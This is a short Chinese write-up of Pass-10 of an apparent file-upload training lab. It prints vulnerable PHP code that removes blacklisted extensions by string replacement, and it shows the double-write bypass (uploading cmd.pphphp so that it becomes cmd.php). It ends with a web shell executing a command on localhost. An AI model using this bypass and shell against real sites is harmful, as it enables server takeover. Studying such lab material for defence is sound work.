本文介绍Pass-10
,后端没有检查后缀名,而是把文件名中的黑名单后缀替换成空字符串.
查看代码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
替换文件名中所有包含黑名单后缀的字符为空,之后保存文件。这样看起来全部都替换了,但是还可以利用双写来绕过。替换的做法和一旦检查到有黑名单后缀就不接着保存是有区别的。
上传文件cmd.pphphp
那么其中的php
这三个连着的字符就会被替换,但是被替换之后又形成了新的php
后缀cmd.php
。
访问http://localhost/upload/cmd.php?cmd=echo%201;
显示
1
执行成功。
Comments | NOTHING